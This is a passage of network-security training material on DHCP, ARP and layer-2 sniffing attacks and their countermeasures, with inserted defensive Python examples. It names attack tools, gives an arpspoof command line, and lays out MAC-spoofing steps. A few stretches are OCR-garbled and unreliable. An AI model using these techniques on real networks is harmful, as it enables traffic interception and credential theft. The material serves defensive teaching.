DHCPRequest | Request, Confirm, Renew, Rebind | Client to servers either (a) requesting offered parameters, (b) confirming the correctness of the previously allocated address, or (c) extending the lease period of the address
DHCPRelease | Release | Client to server relinquishing the network address and canceling the lease
N/A | Reconfigure | The client then sends either a renew/reply or information-request/reply transaction to get the updated information
DHCPInform | Information-Request | Client to server asking only for local configuration parameters; the client already has the externally configured network address
N/A | Relay-Forward | A relay agent sends a relay-forward message to relay messages to servers, either directly or through another relay agent
N/A | Relay-Reply | A server sends a relay-reply message to a relay agent containing a message that the relay agent delivers to a client
DHCPNAK | N/A | Server to client indicating that the client's notion of the network address is incorrect (e.g., the client has moved to a new subnet) or the client's lease has expired

Table 8.8: DHCP request/reply messages

IPv4 DHCP Packet Format
The IPv4 DHCP packet format is also the message format used by Bootstrap Protocol (BOOTP) servers, DHCP clients, and BOOTP relay agents, thus eliminating the need to change the BOOTP client's initialization software to interoperate with DHCP servers.
Figure 8.26: IPv4 DHCP packet format
The following table details every field of the IPv4 DHCP message:
Field | Octets | Description
Opcode | 1 | This field contains the message opcode that represents the message type: opcode "1" represents messages sent by the client, while "2" represents responses sent by the server
Hardware Type | 1 | Hardware address type assigned by the Internet Assigned Numbers Authority (IANA) (e.g., "1" = 10Mb Ethernet)
Hardware Address Length | 1 | Hardware address length in octets
Hops | 1 | In general, DHCP clients optionally set the value to "0"; however, the value is used to count the number of relay agents that forwarded the message
Transaction ID (XID) | 4 | A random number chosen by the client to associate the request messages and their responses between a client and a server
Seconds elapsed | 2 | Seconds since the client began the address acquisition or renewal process
Flags | 2 | Flags set by the client; for example, if the client cannot receive unicast IP datagrams, then the broadcast flag is set
Client IP Address (CIADDR) | 4 | Used when the client has an IP address and can respond to ARP requests
Your IP Address (YIADDR) | 4 | Address assigned to the client
File | 128 | Name of the file containing the BOOTP client's boot image
Options | Variable | DHCP options

Table 8.9: Fields of the IPv4 DHCP message
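The header layout in the table above and the message types in Table 8.8 can be exercised on real bytes. The following parser is an added example, not code from the original course material: it decodes the fixed BOOTP/DHCP header fields (opcode, hardware type and length, hops, XID, seconds, flags, the address fields, sname and file), walks the option TLVs after the magic cookie, and names the message type from option 53. The `build_dhcp` helper only constructs sample input; the MAC address, XID and IP values in it are made up for the example.

```python
import struct
from ipaddress import IPv4Address

MAGIC_COOKIE = b"\x63\x82\x53\x63"          # marks the start of DHCP options (RFC 2131)
OPT_MESSAGE_TYPE, OPT_SERVER_ID, OPT_END, OPT_PAD = 53, 54, 255, 0
MESSAGE_TYPES = {1: "DHCPDISCOVER", 2: "DHCPOFFER", 3: "DHCPREQUEST", 4: "DHCPDECLINE",
                 5: "DHCPACK", 6: "DHCPNAK", 7: "DHCPRELEASE", 8: "DHCPINFORM"}


def parse_dhcp(packet: bytes) -> dict:
    """Decode the fixed-size BOOTP/DHCP header described in the table, then the option TLVs."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message: too short or magic cookie missing")
    op, htype, hlen, hops, xid, secs, flags = struct.unpack("!BBBBIHH", packet[:12])
    msg = {
        "op": {1: "BOOTREQUEST", 2: "BOOTREPLY"}.get(op, op),   # opcode 1 = client, 2 = server
        "htype": htype, "hlen": hlen, "hops": hops, "xid": xid, "secs": secs,
        "broadcast": bool(flags & 0x8000),                         # client cannot take unicast replies
        "ciaddr": str(IPv4Address(packet[12:16])), "yiaddr": str(IPv4Address(packet[16:20])),
        "siaddr": str(IPv4Address(packet[20:24])), "giaddr": str(IPv4Address(packet[24:28])),
        "chaddr": ":".join(f"{b:02x}" for b in packet[28:28 + hlen]),
        "sname": packet[44:108].split(b"\0", 1)[0].decode(errors="replace"),
        "file": packet[108:236].split(b"\0", 1)[0].decode(errors="replace"),  # boot image name
        "options": {},
    }
    i = 240
    while i < len(packet):                   # options are code, length, value; pad has no length
        code = packet[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        length = packet[i + 1]
        msg["options"][code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    mtype = msg["options"].get(OPT_MESSAGE_TYPE)
    msg["type"] = MESSAGE_TYPES.get(mtype[0], "UNKNOWN") if mtype else "UNKNOWN"
    return msg


def build_dhcp(op, xid, chaddr, message_type, yiaddr="0.0.0.0", server_id=None, broadcast=False):
    """Build a minimal DHCP message; used here only to construct sample input for parse_dhcp."""
    hdr = struct.pack("!BBBBIHH", op, 1, 6, 0, xid, 0, 0x8000 if broadcast else 0)  # htype 1 = Ethernet
    hdr += bytes(4) + IPv4Address(yiaddr).packed + bytes(8)          # ciaddr, yiaddr, siaddr, giaddr
    hdr += bytes.fromhex(chaddr.replace(":", "")) + bytes(10)        # chaddr padded to 16 octets
    hdr += bytes(64) + bytes(128) + MAGIC_COOKIE                     # sname, file, magic cookie
    opts = bytes([OPT_MESSAGE_TYPE, 1, message_type])
    if server_id:
        opts += bytes([OPT_SERVER_ID, 4]) + IPv4Address(server_id).packed
    return hdr + opts + bytes([OPT_END])


if __name__ == "__main__":
    # Constructed sample exchange: a broadcast DISCOVER and the OFFER answering it
    discover = parse_dhcp(build_dhcp(1, 0x3903F326, "00:11:22:33:44:55", 1, broadcast=True))
    offer = parse_dhcp(build_dhcp(2, 0x3903F326, "00:11:22:33:44:55", 2,
                                  yiaddr="10.10.10.5", server_id="10.10.10.1"))
    print(discover["type"], discover["chaddr"], offer["type"], offer["yiaddr"])
```

Option 54 (server identifier) in the OFFER is what a defender compares against the list of authorized DHCP servers when hunting for a rogue server; the parser leaves it in `options[54]` as raw bytes.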
DHCP Starvation Attack
In a DHCP starvation attack, an attacker floods the DHCP server by sending numerous DHCP requests and uses all of the available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to a DoS attack. Because of this issue, valid users cannot obtain or renew their IP addresses; thus, they fail to access their network. An attacker broadcasts DHCP requests with spoofed MAC addresses with the help of tools such as
Figure 8.27: DHCP starvation attack (the attacker sends many different DHCP requests with many source MACs; the DHCP server runs out of IP addresses in its scope, 10.10.10.1 to 10.10.10.254, to allocate to valid users)
Module 1117
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
DHCP Starvation Attack Tools
DHCP starvation attack tools send a large number of requests to a DHCP server, leading to exhaustion of the server's address pool. Subsequently, the DHCP server is unable to allocate configurations to new clients.
- Yersinia
Source: https://sourceforge.net
Yersinia is a network tool designed to take advantage of weaknesses in different network protocols like DHCP. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. As shown in the screenshot, attackers use Yersinia to perform a DHCP starvation attack on the target system.
Figure 8.28: Screenshot of Yersinia
Some examples of DHCP starvation attack tools are listed below:
- Hyenae (https://sourceforge.net)
- dhcpstarv (https://github.com)
- Gobbler (https://sourceforge.net)
- DHCPig (https://github.com)
Rogue DHCP Server Attack
In addition to DHCP starvation attacks, an attacker can perform MITM attacks such as sniffing. An attacker who succeeds in exhausting the DHCP server's IP address space can set up a rogue DHCP server on the network, which is not under the control of the network administrator. The rogue DHCP server impersonates a legitimate server and offers IP addresses and other network information to other clients in the network, acting as a default gateway. Clients connected to the network with the addresses assigned by the rogue server will now become victims of MITM and other attacks, whereby packets forwarded from a client's machine will reach the rogue server first.
In a rogue DHCP server attack, an attacker will introduce a rogue server into the network. This rogue server can respond to clients' DHCP discovery requests. Although both the rogue and actual DHCP servers respond to the request, the client accepts the response that comes first. In the case where the rogue server responds earlier than the actual DHCP server, the client takes the response of the rogue server. The information provided to the clients by this rogue server can disrupt their network access, causing a DoS attack.
The DHCP response from the attacker's rogue DHCP server may assign the IP address that serves as a client's default gateway. As a result, the attacker's IP address receives all the traffic from the client. The attacker then captures all the traffic and forwards it to the appropriate default gateway. The client thinks that everything is functioning correctly. This type of attack is difficult for the client to detect for long periods.
Sometimes, the client uses a rogue DHCP server instead of the standard one. The rogue server directs the client to visit fake websites in an attempt to gain their credentials.
To mitigate a rogue DHCP server attack, set the connection between the interface and the rogue server as untrusted. This action will block all incoming DHCP server messages from that interface.
Figure 8.29: Rogue DHCP server attack
How to Defend Against DHCP Starvation and Rogue Server Attacks
Defend Against DHCP Starvation
Enable port security to defend against a DHCP starvation attack. Port security limits the maximum number of MAC addresses on the switch port. When the limit is exceeded, the switch drops subsequent MAC address requests (packets) from external sources, which safeguards the DHCP server against a starvation attack.
Figure 8.30: Defending against DHCP starvation attack
Internetwork Operating System (IOS) Switch Commands
Source: https://www.cisco.com
- switchport port-security
The switchport port-security command configures the switchport parameters to enable port security.
- switchport port-security maximum 1
The switchport port-security maximum command configures the maximum number of secure MAC addresses for the port. The switchport port-security maximum 1 command configures the maximum number of secure MAC addresses for the port as 1.
- switchport port-security violation restrict
The switchport port-security violation command sets the violation mode and the necessary action in case of detection of a security violation. The switchport port-security violation restrict command drops packets with unknown source addresses until a sufficient number of secure MAC addresses are removed.
- switchport port-security aging time 2
The switchport port-security aging time command configures the secure MAC address aging time on the port. The switchport port-security aging time 2 command sets the aging time as 2 minutes.
Figure 8.31: Defending against rogue server attack
IOS Global Commands
Source: https://www.cisco.com
Steps to configure DHCP snooping:
1. ip dhcp snooping
Enables DHCP snooping globally
2. ip dhcp snooping vlan number [number] | vlan {vlan range}]
Enables or disables DHCP snooping on one or more VLANs. For example: ip dhcp snooping vlan 4,104
3. ip dhcp snooping trust
Configures the interface as trusted or untrusted.
4. ip dhcp snooping limit rate
Configures the number of DHCP packets per second (pps) that an interface can receive.
5. end
Exits configuration mode.
6. show ip dhcp snooping
Verifies the configuration
Additional DHCP snooping command:
no ip dhcp snooping information option
To disable the insertion and the removal of the option-82 field, use the no ip dhcp snooping information option global configuration command. To configure an aggregation switch to drop incoming DHCP snooping packets with option-82 information from an edge switch, use the "no ip dhcp snooping information option allow-untrusted" global configuration command.
Note: All ports in the VLAN are untrusted by default.
Sniffing Technique: ARP Poisoning
This section discusses the ARP poisoning technique generally used by attackers to perform sniffing on a target network. Using this method, an attacker can steal sensitive information, prevent network and web access, and perform DoS and MITM attacks using sniffing.
What Is Address Resolution Protocol (ARP)?
Address Resolution Protocol (ARP) is a stateless TCP/IP protocol that maps IP network addresses to the addresses (hardware addresses) used by a data link protocol. Using this protocol, a user can easily obtain the MAC address of any device on a network. Apart from the switch, the host machines also use the ARP protocol for obtaining MAC addresses. ARP is used by the host machine when it wants to send a packet to another device, and has to mention the destination MAC address in the packet. Therefore, to write the destination MAC address in the packet, the host machine should know the MAC address of the destination machine. The OS also maintains the MAC address table (ARP table).
Theprocess the MACaddressusingARPis asfollows:
=
The source machinegenerates a n ARPrequestpacket containing the source MAC
address, anddestinationIP address,
source IPaddress, andsends
i t to theswitch,
theswitchreadsthe MACaddressof the source andsearches
On receivingthe packet,
for in
thisaddress its CAMtable.
Theswitchupdates all the new entries i n it. If the entryis not found i n the table,
the
switchaddsthe MACaddressand its respective incomingport to its CAMtable and
broadcasts
the ARPrequest packetinto the network,
- Each device in the network receives the broadcast ARP request packet and compares the destination IP address in the packet with its own IP address.
- Only the system with an IP address that matches the destination IP address replies with an ARP reply packet.
- The ARP reply message is then read by the switch, which adds the entry to its MAC table and forwards the message to the destination machine, i.e., the machine that sent the ARP request.
- Further, this machine updates the destination machine's IP and MAC address entries into its ARP table, and now communication can take place.
Figure 8.32: Working of ARP protocol

Consider an example that shows two machines connected in a network. The respective hostnames, IPs, and MAC addresses are:

Host Name | IP | MAC
A | 194.54.67.10 | 00:1b:48:64:42:e4
B | 192.54.67.15 | 00-14-20-01-23-47
Before communicating with host B, host A first checks for a record of host B's MAC address in the ARP cache. If host A finds the record of host B's MAC address, it communicates directly with host B. Otherwise, it has to access host B's MAC address using the ARP protocol.
Host A queries all the hosts on the LAN. If the query were phrased in plain English, it might sound like this: "Hello, who is 192.54.67.15? This is 194.54.67.10. My MAC address is 00:1b:48:64:42:e4. I need your MAC address." Here, host A sends a broadcast request data packet to host B. On receiving the ARP request packet, host B updates its ARP cache table with host A's IP and MAC addresses, and sends an
ARP reply packet to host A that would be phrased in English as, "Hey, this is 192.54.67.15; my MAC address is 00-14-20-01-23-47." On receiving the ARP reply, host A updates its ARP cache table with host B's IP and MAC addresses. After establishing a connection, these two hosts can communicate with each other.
Figure 8.33: ARP cache (Command Prompt)
ARP Spoofing Attack
ARP resolves IP addresses to the MAC (hardware) address of the interface to send data. ARP packets can be forged to send data to the attacker's machine. ARP spoofing involves constructing a large number of forged ARP request and reply packets to overload a switch. When a machine sends an ARP request, it assumes that the ARP reply will come from the right machine. ARP provides no means of verifying the authenticity of the responding device. Even systems that have not made an ARP request can accept the ARP replies coming from other devices. Attackers use this flaw in ARP to create malformed ARP replies containing spoofed IP and MAC addresses. Assuming it to be the legitimate ARP reply, the victim's computer blindly accepts the ARP entry into its ARP table. Once the ARP table is flooded with spoofed ARP replies, the switch is set in forwarding mode, and the attacker intercepts all the data that flows from the victim's machine without the victim being aware of the attack. Attackers flood a target computer's ARP cache with forged entries, which is also known as poisoning. ARP spoofing is an intermediary for performing attacks such as DoS, MITM, and session hijacking.
How does ARP Spoofing Work?
ARP spoofing is a method of attacking an Ethernet LAN. When a legitimate user initiates a session with another user in the same layer 2 broadcast domain, the switch broadcasts an ARP request using the recipient's IP address, while the sender waits for the recipient to respond with a MAC address. An attacker eavesdropping on this unprotected layer 2 broadcast domain can respond to the broadcast ARP request and replies to the sender by spoofing the intended recipient's IP address. The attacker runs a sniffer and turns the machine's NIC adapter to promiscuous mode.
ARP spoofing is a method of attacking an Ethernet LAN. It succeeds by changing the IP address of the attacker's computer to that of the target computer. A forged ARP request and reply
packet can find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends frames to the attacker's computer, where the attacker can modify the frames before sending them to the source machine (User A) in an MITM attack. The attacker can also launch a DoS attack by associating a non-existent MAC address to the IP address of the gateway; alternatively, the attacker may sniff the traffic passively and then forward it to the target destination.
Figure 8.34: Working of an ARP spoofing attack
Threats of ARP Poisoning
With the help of ARP poisoning, an attacker can use fake ARP messages to divert all communications between two machines so that all traffic redirects via the attacker's PC.
The threats of ARP poisoning include:
- Packet Sniffing: Sniffs traffic over a network or part of the network.
- Session Hijacking: Steals valid session information and uses it to gain unauthorized access to an application.
- VoIP Call Tapping: Uses port mirroring, which allows the VoIP call tapping unit to monitor all network traffic, and picks only the VoIP traffic to record by MAC address.
- Manipulating Data: ARP spoofing allows attackers to capture and modify data, or stops the flow of traffic.
- Man-in-the-Middle Attack: An attacker performs a MITM attack where they reside between the victim and server.
- Data Interception: Intercepts IP addresses, MAC addresses, and VLANs connected to the switch in a network.
- Connection Hijacking: In a network, the hardware addresses are supposed to be unique and fixed, but a host may move when its hostname changes and use another protocol. In connection hijacking, an attacker can manipulate a client's connection to take complete control.
- Connection Resetting: The wrong routing information could be transmitted due to a hardware/software error. In such cases, if a host fails to initiate a connection, that host
should inform the Address Resolution module to delete its information. The reception of data from that host will reset a connection timeout in the ARP entry used to transmit data to that host. This entry in the ARP module is deleted if the host does not send any information for a certain period of time.
- Stealing Passwords: An attacker uses forged ARP replies and tricks target hosts into sending sensitive information such as usernames and passwords.
- DoS Attack: Links multiple IP addresses with a single MAC address of the target host that is intended for different IP addresses, which will be overloaded with a huge amount of traffic.
ARP Poisoning Tools
- arpspoof
Source: https://linux.die.net
arpspoof redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch.
Syntax: arpspoof -i [Interface] -t [Target Host]
As shown in the screenshot, attackers use the arpspoof tool to obtain the ARP cache; then, the MAC address is replaced with that of an attacker's system. Therefore, any traffic flowing from the victim to the gateway will be redirected to the attacker's system. Further, an attacker can issue the same command in reverse as he/she is in the middle and can send ARP replies in both directions.
Figure 8.35: Screenshot of arpspoof
Some examples of ARP poisoning tools are listed below:
- BetterCAP (https://www.bettercap.org)
- Ettercap (http://www.ettercap-project.org)
- dsniff (https://www.monkey.org)
- MITMf (https://github.com)
- Arpoison (https://sourceforge.net)
How to Defend Against ARP Poisoning
Implementation of Dynamic ARP Inspection (DAI) prevents poisoning attacks. DAI is a security feature that validates ARP packets in a network. When DAI activates on a VLAN, all ports on the VLAN are considered to be untrusted by default. DAI validates the ARP packets using a DHCP snooping binding table. The DHCP snooping binding table consists of MAC addresses, IP addresses, and VLAN interfaces acquired by listening to DHCP message exchanges. Hence, you must enable DHCP snooping before enabling DAI. Otherwise, establishing a connection between VLAN devices based on ARP is not possible. Consequently, a self-imposed DoS may result on any device in that VLAN.
To validate the ARP packet, the DAI performs IP-address-to-MAC-address binding inspection stored in the DHCP snooping database before forwarding the packet to its destination. If any invalid IP address binds a MAC address, the DAI will discard the ARP packet. This eliminates the risk of MITM attacks. DAI ensures the relay of only valid ARP requests and responses.
If the host systems in a network hold static IP addresses, DHCP snooping will not be possible, or other switches in the network cannot run dynamic ARP inspection. In such situations, you have to perform a static mapping that associates an IP address to a MAC address on a VLAN to prevent an ARP poisoning attack.
Figure 8.36: Defending against ARP poisoning
Configuring DHCP Snooping and Dynamic ARP Inspection on Cisco Switches
As discussed, DHCP snooping must be enabled before enabling DAI. DHCP snooping is a security feature that builds and maintains a DHCP snooping binding table and filters untrusted DHCP messages. A Cisco switch with DHCP snooping enabled can inspect DHCP traffic flow at a layer 2 segment and track IP addresses to switchport mapping.
To configure DHCP snooping on a Cisco switch, ensure DHCP snooping is enabled both globally and per access VLAN. To enable DHCP snooping, execute the following commands:
Configuring DHCP snooping in global configuration mode
Switch(config)# ip dhcp snooping
Configuring DHCP snooping for a VLAN
Switch(config)# ip dhcp snooping vlan 10
Switch(config)# ^Z
To view the DHCP snooping status
Switch# show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs: 10
DHCP snooping is operational on following VLANs: 10
DHCP snooping is configured on the following L3 Interfaces
If the switch is functioning only at layer 2, apply the ip dhcp snooping trust command to the layer 2 interfaces on which the switch should accept DHCP responses. Dynamic ARP inspection is then enabled for a VLAN by specifying the VLAN numbers.
(Output of show ip arp inspection vlan 10: Vlan 10; Dest MAC Failures 0; IP Validation Failures 0; Invalid Protocol Data 0)
additional validation checks. To do so, execute the command ip arp inspection validate followed by the address type.
Assume that an attacker with the source IP address 192.168.10.1 connects to VLAN 10 on interface FastEthernet0/5 and sends ARP replies, pretending to be the default router for the subnet in an attempt to initiate an MITM attack. The switch with DAI enabled inspects these reply packets by comparing them with the DHCP snooping table. The switch then tries to find an entry for the source IP address 192.168.10.1 on port FastEthernet0/5. If there is no entry, then the switch discards these packets.
(Output of show ip arp inspection: Configuration Enabled, Operation Active; ACL Logging, DHCP Logging, Probe Logging; Dest MAC Failures 0, IP Validation Failures 0, Invalid Protocol Data 0)
ARP Spoofing Detection Tools
- XArp
Source: http://www.xarp.net
XArp is a security application that detects ARP-based attacks. It detects critical network attacks that firewalls cannot cover. It uses advanced techniques to detect ARP attacks like ARP spoofing. The detection mechanism relies on two techniques: inspection modules and discoverers. Inspection modules look at ARP packets and check their correctness and validity concerning the databases they have built up. Discoverers actively validate IP-MAC mappings and actively detect attackers. The mechanism detects ARP attacks and keeps data private. It even monitors whole subnets for ARP attacks. This application screens the whole subnet for ARP attacks using different security levels and fine-tuning possibilities. A local network that is subject to ARP attacks inspects every ARP packet and reports attacks against remote machines.
As shown in the screenshot, security professionals use XArp to detect ARP spoofing attacks performed on the systems.
Figure 8.37: Screenshot of XArp
Some examples of ARP spoofing detection tools are listed below:
- Capsa Network Analyzer (https://www.colasoft.com)
- ArpON (https://sourceforge.net)
- ARP AntiSpoofer (https://sourceforge.net)
- ARPStraw (https://github.com)
- shARP (https://github.com)
Sniffing Technique: Spoofing Attacks
Besides ARP spoofing, an attacker can also use MAC spoofing, IRDP spoofing, VLAN hopping, and STP attacks to sniff the traffic of a target network. This section describes spoofing techniques that help attackers to steal sensitive information. This section also explains how to defend against MAC spoofing, VLAN hopping, and STP attacks.
MAC Spoofing/Duplicating
MAC duplicating refers to spoofing a MAC address with the MAC address of a legitimate user on the network. A MAC duplicating attack involves sniffing a network for the MAC addresses of legitimate clients connected to the network. In this attack, the attacker first retrieves the MAC addresses of clients who are actively associated with the switch port. Then, the attacker spoofs a MAC address with the MAC address of the legitimate client. If the spoofing is successful, then the attacker can receive all the traffic destined for the client. Thus, an attacker can gain access to the network and take over the identity of someone on the network.
The diagram shows how an attacker performs a MAC spoofing/duplicating attack.
Figure 8.38: MAC spoofing/duplicating attack
Note: This technique can be used to bypass wireless access points' MAC filtering.
MAC Spoofing Technique: Windows
Method 1: Steps to change the MAC address in Windows 10
In Windows 10, click Start, search for Control Panel, and open it. Type "ipconfig" in the Command Prompt to view the current configuration.
In the Ethernet Properties window, click on the Configure button and then on the Advanced tab. Under the "Property" section, browse for Network Address and click on it. On the right-hand side, under "Value," type in the new MAC address number you would like to assign and click OK.
Note: Enter the MAC address without ":" in between. Type "ipconfig /all" or "net config rdr" to verify the change.
Figure 8.39: Ethernet Properties dialog box
Method 2: Steps to change the MAC address in the registry
1. Press Win + R to open Run, and type regedt32 to start the registry editor.
Note: Do not type Regedit to start the registry editor.
2. Go to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{...1ce-bfc1-08002be10318}" and double-click on it to expand the tree. Four-digit sub keys representing network adapters will be found (starting with 0000, 0001, 0002, etc.)
3. Search for the proper "DriverDesc" key to find the desired interface.
4. Right-click the appropriate subkey and add the new string value "NetworkAddress" (data type "REG_SZ") to contain the new MAC address.
Figure 8.40: Registry Editor
MAC Spoofing Tools
- Technitium MAC Address Changer
Source: https://technitium.com
Technitium MAC Address Changer (TMAC) allows you to change (spoof) the MAC address of your NIC instantly. Every NIC has a MAC address hardcoded in its circuit by the manufacturer. This hard-coded MAC address is used by Windows drivers to access the Ethernet network (LAN). This tool can set a new MAC address to your NIC, bypassing the original hard-coded MAC address. As shown in the screenshot, attackers can use TMAC to spoof or change their MAC address to perform an attack on the target system.
Figure 8.41: Screenshot of Technitium MAC Address Changer (TMAC)
Some examples of MAC spoofing tools are listed below:
- SMAC (http://www.klcconsulting.net)
- MAC Address Changer (https://www.novirusthanks.org)
- Change MAC Address (https://lizardsystems.com)
- Easy MAC Changer (https://github.com)
- Spoof-Me-Now (https://sourceforge.net)
IRDP Spoofing
ICMP Router Discovery Protocol (IRDP) is a routing protocol that allows a host to discover the IP addresses of active routers on its subnet by listening to router advertisement and solicitation messages on its network. The attacker can add default route entries on a system remotely by spoofing router advertisement messages. As IRDP does not require any authentication, the target host will prefer the default route defined by the attacker over the default route provided by the DHCP server. The attacker accomplishes this by setting the preference level and lifetime of the route at high values to ensure that the target hosts will choose it as the preferred route. This attack succeeds if the attacker launching the attack is on the same network as the victim. In the case of a Windows system configured as a DHCP client, Windows checks the received router advertisements for entries. If there is only one, then it checks whether the IP source address is within the subnet. If so, then it adds the default route entry; otherwise, it ignores the advertisement.
Figure 8.42: IRDP spoofing
An attacker can use this to send spoofed router advertisement messages so that all the data packets travel through the attacker's system. Thus, the attacker can sniff the traffic and collect valuable information from the data packets. Attackers can use IRDP spoofing to launch MITM, DoS, and passive sniffing attacks.
- Passive Sniffing: In a switched network, the attacker spoofs IRDP traffic to re-route the outbound traffic of target hosts through the attacker's machine.
- MITM: Once sniffing starts, the attacker acts as a proxy between the victim and the destination. The attacker plays an MITM role and tries to modify the traffic.
- DoS: IRDP spoofing allows remote attackers to add wrong route entries into the victim's routing table. The wrong address entry causes DoS.
Prevent IRDP spoofing attacks by disabling IRDP on hosts, if the OS permits it.
VLAN Hopping
Virtual local area network (VLAN) hopping is a technique used to target network resources present on a VLAN. The main purpose behind a VLAN hopping attack is to gain access to the traffic flowing in other VLANs present in the same network, which is otherwise inaccessible. Networks usually have poor VLAN implementation or have misconfigurations that allow attackers to perform this type of attack. Attackers perform VLAN hopping attacks to steal sensitive information such as passwords; modify, corrupt, or delete data; install malicious codes or programs; or spread viruses, Trojans, and worms throughout the network.
VLAN hopping attacks can be performed via two primary methods, as given below:
- Switch Spoofing
Using switch spoofing, the attacker connects a rogue switch into the network by tricking a legitimate switch and thereby creating a trunk link between them. After establishing a trunk link, the traffic from multiple VLANs can be sent to and through the rogue switch, therefore allowing an attacker to sniff and view the packet content. This attack is successful only when the legitimate switch is configured to negotiate a trunk connection, or when the interface is configured with "dynamic auto," "dynamic desirable," or "trunk" mode.
- Double Tagging

Figure 8.44: Illustration of double tagging
STP Attack

In a Spanning Tree Protocol (STP) attack, attackers connect a rogue switch into the network to change the operation of the STP protocol and sniff all the network traffic. STP is used in LAN switched networks with the primary function of removing potential loops within the network. STP ensures that the traffic inside the network follows an optimized path to enhance network performance. In this process, a switch inside the network is appointed as the root bridge. After the selection of the root bridge, other switches in the network connect to it by selecting a root port (the closest port to the root bridge).

The root bridge is selected with the help of Bridge Protocol Data Units (BPDUs). BPDUs each have an identification number known as a Bridge ID or BID. These BIDs consist of the Bridge Priority and the MAC address. By default, the value of the Bridge Priority is 32769.
Figure 8.45: Illustration of an STP attack
How to Defend Against MAC Spoofing

Performing security assessments is the primary aim of an ethical hacker. An ethical hacker attacks a target network or organization with the knowledge and authorization of its management, to find loopholes in the security architecture. However, the job does not end there. Finding those loopholes is a minor task. The most crucial task of ethical hacking is to apply the appropriate countermeasures to security loopholes to fix them.

Once you have tested the network for MAC spoofing attacks and collected security loopholes, you should apply countermeasures to protect the network from further MAC spoofing. Many MAC spoofing countermeasures can be applied to specific network architectures and loopholes. Apply the appropriate countermeasures to your network.

To detect MAC spoofing, it is necessary to know all the MAC addresses in the network. The best way to defend against MAC address spoofing is to place the server behind the router. This is because routers depend only on IP addresses, whereas switches depend on MAC addresses for communication in a network. Making changes to the port security interface configuration is another way to prevent MAC spoofing attacks. Once you enable the port-security command, it allows you to specify the MAC address of the system connected to the specific port. It also allows for specific action to be taken if a port security violation occurs.

You can also implement the following techniques to defend against MAC address spoofing attacks:
- DHCP Snooping Binding Table: The DHCP snooping process filters untrusted DHCP messages and helps to build and bind a DHCP binding table. This table contains the MAC address, IP address, lease time, binding type, VLAN number, and interface information to correspond with untrusted interfaces of a switch. It acts as a firewall between untrusted hosts and DHCP servers. It also helps in differentiating between trusted and untrusted interfaces.
- Dynamic ARP Inspection: The system checks the IP-MAC address binding for each ARP packet in a network. While performing a DAI, the system will automatically drop invalid IP-MAC address bindings.
- IP Source Guard: IP Source Guard is a security feature in switches that restricts the IP traffic on untrusted layer 2 ports by filtering traffic based on the DHCP snooping binding database. It prevents spoofing attacks when the attacker tries to spoof or use the IP address of another host.
- Encryption: Encrypt the communication between the access point and computer to prevent MAC spoofing.
- Retrieval of MAC Address: You should always retrieve the MAC address from the NIC directly instead of retrieving it from the OS.
- Implementation of IEEE 802.1X Suites: This is a type of network protocol for port-based Network Access Control (PNAC), and its main purpose is to enforce access control at the point where a user joins the network.
- AAA (Authentication, Authorization, and Accounting): Use an AAA (Authentication, Authorization, and Accounting) server mechanism to filter MAC addresses subsequently.

Figure 8.46: Defending against MAC spoofing
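The three switch features above (DHCP snooping binding table, Dynamic ARP Inspection, IP Source Guard) all work off one data structure: the binding table that snooping builds from DHCP ACKs seen on trusted ports. The following model, an added example that is not EC-Council's or any switch vendor's code, shows how the three checks consult that table. Port names, MAC addresses, the 10.0.0.0/24 addresses and the packet dictionaries are constructed for the demo.

```python
"""Switch-side model of DHCP snooping, Dynamic ARP Inspection (DAI) and IP
Source Guard (IPSG).  Added example, not EC-Council's or any vendor's code;
port names, MAC and IP addresses below are constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Binding:
    mac: str
    ip: str
    vlan: int
    port: str
    lease: int


class SnoopingSwitch:
    def __init__(self, trusted_ports):
        self.trusted = set(trusted_ports)   # uplinks towards the real DHCP server
        self.bindings = {}                  # mac -> Binding (the snooping binding table)
        self.dropped = []                   # audit trail of what was filtered

    def on_dhcp(self, pkt):
        """DHCP snooping: server messages are only believed on trusted ports;
        each ACK seen there becomes a binding for the client's access port."""
        if pkt["msg"] in ("OFFER", "ACK") and pkt["in_port"] not in self.trusted:
            self.dropped.append(f"rogue DHCP {pkt['msg']} on {pkt['in_port']}")
            return False
        if pkt["msg"] == "ACK":
            self.bindings[pkt["client_mac"]] = Binding(
                pkt["client_mac"], pkt["yiaddr"], pkt["vlan"], pkt["client_port"], pkt["lease"])
        return True

    def on_arp(self, pkt):
        """DAI: on untrusted ports the sender MAC/IP pair must match a binding
        learned on that same port, otherwise the ARP packet is dropped."""
        if pkt["in_port"] in self.trusted:
            return True
        b = self.bindings.get(pkt["sender_mac"])
        if b and b.ip == pkt["sender_ip"] and b.port == pkt["in_port"]:
            return True
        self.dropped.append(f"DAI: {pkt['sender_ip']} claimed by {pkt['sender_mac']} on {pkt['in_port']}")
        return False

    def on_ip(self, pkt):
        """IPSG: on untrusted ports the IP source (and MAC) must be bound to the
        ingress port; a host borrowing another host's address is filtered."""
        if pkt["in_port"] in self.trusted:
            return True
        b = self.bindings.get(pkt["src_mac"])
        if b and b.ip == pkt["src_ip"] and b.port == pkt["in_port"]:
            return True
        self.dropped.append(f"IPSG: {pkt['src_ip']} from {pkt['src_mac']} on {pkt['in_port']}")
        return False


def run_demo():
    """Walk a constructed lease, a rogue DHCP server, a spoofed ARP and a spoofed IP source."""
    sw = SnoopingSwitch(trusted_ports={"Gi1/0/1"})
    results = {}
    # Legitimate lease: the server on the trusted uplink answers the client on Gi1/0/5.
    results["ack_trusted"] = sw.on_dhcp({"msg": "ACK", "in_port": "Gi1/0/1", "client_mac": "aa:aa:aa:00:00:05",
                                         "client_port": "Gi1/0/5", "yiaddr": "10.0.0.10", "vlan": 10, "lease": 3600})
    # A rogue DHCP server on an access port is ignored and never creates a binding.
    results["ack_rogue"] = sw.on_dhcp({"msg": "ACK", "in_port": "Gi1/0/7", "client_mac": "aa:aa:aa:00:00:05",
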